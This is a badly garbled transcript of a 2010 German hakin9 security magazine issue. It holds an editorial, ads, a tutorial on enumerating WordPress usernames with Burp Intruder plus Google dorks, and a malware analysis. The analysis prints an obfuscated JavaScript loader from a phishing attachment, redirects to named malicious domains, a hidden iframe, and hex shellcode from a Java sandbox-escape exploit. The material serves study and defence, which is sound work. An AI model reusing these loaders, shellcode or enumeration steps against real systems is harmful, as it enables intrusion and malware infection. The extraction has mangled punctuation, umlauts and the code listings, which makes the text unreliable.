liebe hakin9 leser, - soup.ioasset.soup.io/asset/1234/2704_66cc.pdf · treffen, möchten wir...
Post on 01-May-2020
8 Views
Preview:
TRANSCRIPT
4HAKIN9 52009
Das Hauptthema dieser Ausgabe von Hakin9 ist Penetration Testing Im Jahr
2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Ist
es wirklich so
Daruumlber erfahren Sie aus dem Artikel von Dimitri Roschkowski ldquoPenetration
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun
Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher
Peick ldquoMalware-Doppelschlag per JavaScript und JavaAppletldquo in der Rubrik
Fortgeschrittene
In der letzten Ausgabe hat Andreas Lentwojt ausfuumlhrlich die Norm ISOIEC
27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein
Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement
befasst In der heutigen Ausgabe wird der Autor in dem Artikel ldquoIT-
Risikomanagement ndash Wozu brauche ich dasldquo darstellen warum es nuumltzlich
ist sich mit dem Risikomanagement der IT zu beschaumlftigen und dabei auf das
Modell der ISO 27005 zuruumlck zu greifen Auf dieses Thema wurde bereits in
einer fruumlheren Ausgabe eingegangen in diesem Artikel wird aber mehr auf die
Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche
herrscht trotzdem ein Frauenmangel Warum ist es so Woraus resultieren die
Vorurteile gegen die Frauen die sich mit Computern beschaumlftigen Wie sieht
die Situation von Frauen in der IT-Branche aus
Auf diese und viele andere Fragen antwortet unsere Gespraumlchspartnerin
Ulrike Peter im Interview bdquoErfolgreiche Frauen in der IT-Branche - ein
Erfahrungsberichtldquo das in dieser Ausgabe von Hakin9 besonders zu empfehlen
ist
Sie moumlchten unser Heft jeden Monat automatisch bekommen Nichts ein-
facher als dies Registrieren Sie sich fuumlr unseren Newsletter auf wwwhakin9org
de und Sie werden regelmaumlszligig jede Hakin9 Ausgabe in Ihrem E-Mail-Account
schickt
Ich hoffe dass wir mir dieser Ausgabe Ihren Herausforderungen gewachsen
sind
Viel Spaszlig beim Lesen
LIEBE HAKIN9 LESER
4
INHALTSVERZEICHNIS
FORTGESCHRITTENE11 Malware-Doppelschlag per JavaScript und JavaAppletMichael PeickBesonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr we-nig Einflussnahme des Anwenders Schadsoftware ins-tallieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
PRAXIS17 Penetration Testing im Jahre 2010Dimitri RoschkowskiViele Administratoren uumlbersehen leider bei der Absi-cherung des Netzwerkes seine physikalische Sicher-heit Die Bedrohung kommt nicht nur durch das Ether-net-Kabel
ABWEHR25 OCTAVE ndash Hier macht das Risiko die Musik Helmut KaufmannDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanage-ment und Business Continuity Planning zu implemen-tieren
FUumlR EINSTEIGER06 User Enumeration bei Web-ApplikationenKai RenzWo der normale Benutzer nicht hin soll wo wichtige Daten nur fuumlr einen kleinen Kreis an Personen zugaumlng-lich sein sollen wo administrative Aufgaben erledigt werden - uumlberall dort werden Authentifizierungen ein-gesetzt
102010
4 62010
herausgegeben vom VerlagSoftware Press Sp z o o SK
Geschaumlftsfuumlhrer
Managing Director
ewalozowickasoftwarecompl
Chefredakteurin
ilonaprzybyslawskasoftwarecompl
RedaktionBetatester Kai Renz Michael Peick Dimitri Roschkowski Helmut Kauf-mann Andreas Lentwojt Patrick Schmid Tobias Glemser Ulrike Peter Nicole Huck Michael Schratt
Produktion Andrzej KucaDTP
Umschlagsentwurf
Werbung advsoftwarecompl
Anschrift
Software Press Sp z oo SKul Bokserska 1 02-682 Warszawa PolandTel +48 22 427 36 56 Fax +48 22 244 24 59wwwhakin9orgde
Die Redaktion bemuumlht sich dafuumlr Sorge zu tragen dass die in der Zeitschrift sowie auf den begleitenden Datentraumlgern erhaltenen Informationen und Anwendungen zutreffend und funktionsfaumlhig sind uumlbernimmt jedoch keinerlei Gewaumlhr fuumlr derer Geeignetheit fuumlr bestimmte Verwendungszwecke Alle Mar-kenzeichen Logos und Handelsmarken die sich in der Zeitschrift befinden sind regist-rierte oder nicht-registrierte Markenzeichen der jeweiligen Eigenuumlmer und dienen nur als inhaltliche Ergaumlnzungen
Anmerkung
Die in der Zeitschrift demonstrierten Techniken sind AUSSCHLIEszligLICH in eigenen Rechner-netzen zu testen Die Redaktion uumlbernimmt keine Haftung fuumlr eventuelle Schaumlden oder Konsequenzen die aus der unangemessenen Anwendung der beschriebenen Techniken entstehen Die Anwendung der dargestellten Techniken kann auch zum Datenverlust fuumlhrenhakin9 erscheint in folgenden Sprachversionen und Laumlndern deutsche Version (Deutschland Schweiz Oumlsterreich Luxemburg) franzoumlsische Version (Frankreich Kanada Belgien Marok-ko) spanische Version (Spanien Portugal) polnische Version (Polen) englische Version (Kanada USA)
hakin9orgde 5
44 Interview mit Ulrike PeterbdquoDie IT ist (und bleibt es sicher auch) eine Maumlnnerdo-maumlne ndash Frauen in der IT-Branche sind ParadiesvoumlgelldquoMehr erfahren Sie aus dem Interview mit Ulrike Peter ndash freie Journalistin und seit zehn Jahren fuumlr unterschiedli-che Unternehmen und Medien in der IT-Branche taumltige PR-Spezialistin
REZENSIONEN46 SAP for DFPS Implementierung und Custo-mizingNicole HuckDas Buch SAP for DFPS Implementierung und Cus-tomizing basiert auf mehr als 20 Jahren Erfahrung die die Autoren insgesamt bei der Entwicklung Imple-mentierung aber auch Schulung der Loumlsung sammeln konnten
5
30 IT-Risikomanagement ndash Wozu brauche ich dasAndreas LentwojtIn der letzen Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Ein-blick in die 27000-Familie gegeben Ein Teil dieser Fa-milie ist die ISO 27005 die sich mit dem IT-Risikoma-nagement befasst
ANGRIFF37 DNS Cache PoisoningPatrick SchmidAls Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschie-ben koumlnnen
INTERVIEW 41 Interview mit Tobias GlemserbdquoSicherheit darf nicht erst am Ende von neuen Anwen-dungen Produkten oder Projekten als Kontrollinstru-ment einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoMehr erfahren Sie aus dem Interview mit Tobias Glem-ser ndash leitender IT-Sicherheitsberater bei der Tele-Con-sulting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbe-reich Penetrationstests
InhaltsverzeIchnIs
Im Zusammenhang mit den Aumlnderungen die in letzter Zeit in dem
deutschen Recht stattgefunden haben und die IT-Sicherheit be-
treffen moumlchten wir ankuumlndigen dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt
Unser Magazin dient ausschlieszliglich den Erkenntniszwecken
Alle im Magazin praumlsentierten Methoden sollen fuumlr eine sichere IT
fungieren Wir legen einen groszligen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Be-
kaumlmpfung von IT Kriminalitaumlt
920106
FUumlR EINSTEIGER
Das Problem mit solchen Authentifizierung ist dass sie nur maximal so sicher sind wie ihr schwaumlchstes Glied Durch das Web 20 wird im-
mer mehr auf Komfort und Benutzerfreundlichkeit ge-setzt wodurch einfache Sicherheitsmechanismen ihre Wirkung verfehlen Bruteforce Angriffe galten durch die schier unendlichen Kombinationsmoumlglichkeiten als bdquonicht mehr praktikabelldquo Viele Seiten erlauben es uns aber die Anzahl an Versuchen drastisch einzuschraumln-ken da sie Informationen preisgeben die einen Angriff oftmals bedeutend einfacher machen
Wenn Sie sich heute im Internet herumtreiben finden Sie sich zwischen Social Networks Auktionsplattfor-men und Tauschboumlrsen wieder Identitaumlten werden im Netz frei und fuumlr jedermann zugaumlnglich eingestellt und manch einem kommt es vor wie wenn er durch Twit-ter und Co mehr uumlber seinen Nachbarn wuumlsste wie uumlber seinen langjaumlhrigen Freund Obwohl viele immer noch der Ansicht sind sich frei und anonym im Internet bewegen zu koumlnnen so stellen sie doch Details uumlber ihr Leben jedem frei zur Verfuumlgung Sie denken ein frei erfundener Benutzername halte die meisten davon ab ihre wahre Identitaumlt herauszufinden Lassen Sie sich gesagt sein das dies ein Irrtum ist ndash ein sehr groszliger Irr-tum Die Gefahr die all dies mit sich bringt ist leicht zur erklaumlren Stellen Sie sich vor sie arbeiten in einem gro-szligen Telekommunikationsunternehmen Uumlber Facebook und Xing halten Sie gerne Kontakt mit Kollegen aus
dem Ausland ndash dafuumlr sind diese Plattformen ja schlieszlig-lich auch bestens geeignet Doch was wenn jemand ihr Konto uumlbernimmt und unter Ihrem Namen dort Humbug treibt Stellen Sie dies nicht sofort fest so kann diese Internetplattform schnell zu einem sehr groszligen Problem werden Schon bei der Anmeldung bei diesen Seiten le-gen wir unsere wichtigen Daten in die Haumlnde der Betrei-ber ohne das uns eigentlich wirklich interessiert wofuumlr diese weiter verwendet werden Erst wenn mal wirklich ein groszliger Skandal an die Oberflaumlche dringt herrscht Empoumlrung und die allgemeine bdquoich hablsquos doch gesagtldquo-Stimmung kommt auf Bei Spammern und Crackern sind Accounts zu Auktionsplattformen Email-Konten und Social Networks sehr beliebt da viele Benutzer fuumlr mehrere Zugaumlnge das selbe Passwort verwenden und so zum Beispiel durch den eBay-Account auf Rechnung des Opfers eingekauft werden kann Ein Benutzer kann hier nur wenige trotzdem aber effektive Maszlignahmen ergreifen Ein sicheres Passwort zu waumlhlen ist der erste und wichtigste Schritt wobei immer mehr Passwoumlrter uumlber nicht-verschluumlsselte Verbindungen und Keylogger abgefangen werden und somit auch das sicherste Pass-wort nutzlos ist Ein zweiter Schritt waumlre verschiedene Passwoumlrter fuumlr die unterschiedlichen Seiten zu verwen-den und diese regelmaumlszligig zu erneuern Dieser Schritt wird aber leider nur sehr selten wirklich umgesetzt da er mit grossem Aufwand verbunden ist und die meisten Benutzer keine Lust haben sich mehrere verschiedene
User Enumeration bei Web-Applikationen
Wo der normale Benutzer nicht hin soll wo wichtige Daten nur fuumlr einen kleinen Kreis an Personen zugaumlnglich sein sollen wo administrative Aufgaben erledigt werden - uumlberall dort werden Authentifizierungen eingesetz
IN DIESEM ARTIKEL ERFAHREN SIE
-ren
-den
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Kai Renz
User Enumeration bei Web-Applikationen
hakin9orgde 7
anders vorgehen er uumlberpruumlft den Login-Mechanismus auf Ausgaben welche den Benutzernamen verraten oder Hinweise darauf geben koumlnnten ob der zum Test angegebene Name ein wahrer Benutzername ist Hin-weise darauf geben Ruumlckgaben wie bdquoDas fuumlr diesen Be-nutzernamen angegebene Passwort ist nicht korrektldquo oder aumlhnliches Gegengepruumlft werden kann dies durch die Eingabe eines fiktiven Benutzers Variiert die Aus-gabe von der obigen so ist es sehr wahrscheinlich dass der zuvor verwendete Name korrekt war
Ein weiterer Angriffsvektor ist die bdquoPasswort-verges-sen-Funktionldquo Ist solch eine Funktion schlecht ge-schrieben oder ist diese einfach nur zu leichtsinnig dem Benutzer Komfortfunktionen anzubieten koumlnnen fuumlr den Angreifer wichtige Informationen preisgeben werden Eine Fehlkonfiguration bzw leichtsinnige Web 20 Funktion wie die eben angesprochene kann zum Beispiel bei Eingabe der Mailadresse auf der Passwort-Vergessen-Seite mit einem Satz wie bdquoEine Email mit Ihrem neuen Passwort fuumlr den Benutzeraccount ltna-megt wurde erfolgreich an Sie zugestelltldquo antworten wodurch der wahre Benutzer zwar eine Email der An-greifer jedoch auch den Benutzernamen erhaumllt Ist die angegebene Sicherheitsadresse inaktiv oder wird nur sporadisch verwendet so geht diese Email leicht un-ter und der Angreifer kann mit seiner Arbeit fortfahren Ein gutes Beispiel hierfuumlr ist Wordpress Auch in seiner neuesten Version kann uumlber die bdquoPasswort-vergessen-Funktionldquo der Benutzername herausgefunden werden Ein sogenannter Bot-Schutz ist nicht vorhanden so-dass wir das ganze mit einem Webproxy in unserem Fall Burpsuite automatisieren koumlnnen
Durch eine lokale Recherche an einem Wordpress haben wir herausgefunden dass beim Eingeben eines falschen Benutzernamens ein Fehler zuruumlckgegeben wird ERROR Invalid username or e-mail Verwenden wir jedoch den richtigen Benutzernamen erhalten wir ein Check your e-mail for the confirmation link
Passwoumlrter zu merken Oftmals werden zwar viele ver-schiedene Zugangsdaten verwendet durch das haumlufige wechseln werden dann aber eher einfache Passwoumlrter verwendet damit der Benutzer sich diese leicht merken kann
Um einen Zugang zum Benutzerkonto des Anwen-ders zu bekommen sind meist ein Benutzername und ein Passwort noumltig Oftmals fangen hier schon die Pro-bleme an Hat der Angreifer herausgefunden dass sich die Benutzer durch eine Email-Passwort-Kombination anmelden koumlnnen muss er schon mal viel weniger Zeit investieren den Benutzernamen herauszufinden was bei einem Bruteforce-Angriff ein Zeitvorteil sein wel-cher zwischen durchfuumlhrbar und nicht durchfuumlhrbar al-so Erfolg und Misserfolg entscheidet Oftmals reicht al-so schon eine simple Registrierung bei einer Zielseite um die Feinheiten einer Anmeldefunktion herauszufin-den und auszunutzen Kann ein Benutzer seinen Nick-namen frei waumlhlen so sind die Moumlglichkeiten bei einem Bruteforce-Angriff wieder immens sodass der Angrei-fer eine andere Taktik waumlhlen muss Er wird versuchen ohne muumlhsames Durchprobieren von Kombinationen an den Benutzernamen zu kommen oder einen ande-ren Schwachpunkt im System ausnutzen In diesem Artikel werde ich ein paar einfache Moumlglichkeiten dar-stellen um einer Web-Applikation Benutzernamen zu entlocken (User Enumeration) und diese automatisch aufzunehmen
Wie bereits oben beschrieben kann sich der Angrei-fer sofern er dazu berechtigt ist zuerst ein Bild vom Re-gistrierungs- bzw Login-Mechanismus machen Findet er beispielsweiszlige heraus dass der Benutzername eine Mailadresse ist so kann er leicht Suchmaschinen oder Social Networks verwenden um diese herauszufinden Werden frei waumlhlbare Benutzernamen verwendet so faumlllt diese Art von Recherche weitestgehend aus wo-bei natuumlrlich auch hier manchmal ein Gluumlckstreffer da-bei sein kann In so einem Fall wird der Angreifer aber
Abbildung 1 Funktionsweiszlige einfache User Enumeration
Benutzername 1a2a3d4fPasswort sosecret
Benutzername foobarPasswort sosecret
Bruteforce
Benutzername foobarPasswort topsecret
Request Response
Benutzer oder Passwort falsch
Falsches Passwort
Login erforgreich
920108
FUumlR EINSTEIGER
Nun muumlssen wir uns genauer ansehen was zwischen unserem Client und dem Webserver kommuniziert wird Hierfuumlr starten wir Burpsuite und konfigurieren unseren Browser so dass er als Proxy localhost auf Port 8080 verwendet Als naumlchstes wechseln wir in den Proxy-Tab und setzen Intercept auf Off Durch das Deaktivieren dieser Funktion verhindern wir das uns Burpuite bei jedem Schritt fraumlgt ob wir die Daten wirklich zu unse-rem Webserver senden wollen Als naumlchstes besuchen wird unsere Zielseite Wordpress verwendet immer das gleiche Schema httpwwwzielseitedewp-login
phpaction=lostpassword Wir geben absichtlich ei-nen falschen Benutzernamen an und verfolgen wie die
POST-Anfrage und deren Antwort von Burpsuite aufge-zeichnet werden Dort koumlnnen wir unter request -gt pa-
rams unsere gerade eingegebenen und noch weitere Daten betrachten (Abbildung 2)
Als naumlchstes senden wir den Request per Rechts-klick an den Intruder Das Target-Tab lassen wir unbe-ruumlhrt wir werden erst bei den Positions-Optionen aktiv Wir klicken rechts auf bdquoclear $ldquo Als Attacke verwenden wir Sniper Ganz unten im Textfeld sehen wir eine Zeile mit bdquouser_loginldquo Dies sind die Parameter die per POST uumlbergeben werden Ich markiere den zum Test einge-gebenen Benutzername und klicke auf bdquoadd $ldquo (Abbil-dung 3)
Abbildung 3 Der Parameter der veraumlndert werden soll wird markiert
Abbildung 2 Unser POST-Request an Wordpress
User Enumeration bei Web-Applikationen
hakin9orgde 9
Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
